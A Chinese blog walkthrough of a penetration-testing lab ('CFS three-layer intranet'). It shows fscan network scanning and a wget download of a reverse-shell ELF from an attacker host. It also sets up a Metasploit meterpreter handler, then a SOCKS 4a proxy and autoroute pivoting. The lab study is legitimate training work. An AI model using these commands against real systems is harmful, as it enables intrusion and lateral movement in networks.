CFS三层内网渗透——进入二层内网并socks转发流量(二)

目录

信息收集阶段

fscan收集

对这个网段进行信息扫描

收集成功

上线阶段

​成功上传病毒文件

 给病毒文件添加可执行权限

进入msfconsole开启监听

​运行后门elf等上线

​成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

配置参数,socks版本4a比较稳定 

​run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

 配置socks的代理到浏览器

​不开启代理不能访问

开启后成功访问 


生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式

Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问,不带命令参数的话就是简单的访问远程目标文件,不会进行下载。这里我拿kali来演示,先创建个要传输的文件,然后python开启监听。https://blog.csdn.net/weixin_74171325/article/details/140079615?utm_source=miniapp_weixin

信息收集阶段

fscan收集

对这个网段进行信息扫描

chmod u+x fscan   #给个权限
./fscan -h 192.168.22.0/24  开始收集

收集成功

上线阶段

wget http://192.168.20.128:8000/10000_reverse.elf

成功上传病毒文件

 给病毒文件添加可执行权限

chmod u+x 10000_reverse.elf

进入msfconsole开启监听

handler -p linux/x64/meterpreter_reverse_tcp -H 192.168.20.128 -P 10000

运行后门elf等上线

 成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

search socks

配置参数,socks版本4a比较稳定 

set srvport 20000   #修改端口
set version 4a      #修改版本

run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

sessions  
sessions 1               #进入上线主机
run autoroute -s 192.168.22.0/24   #搞个路由转发,连通我们的公网
run autoroute -p  #可以看到我们的sessions 1已经成功链接这个网段

 配置socks的代理到浏览器

 不开启代理不能访问

开启后成功访问 

  • 23
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值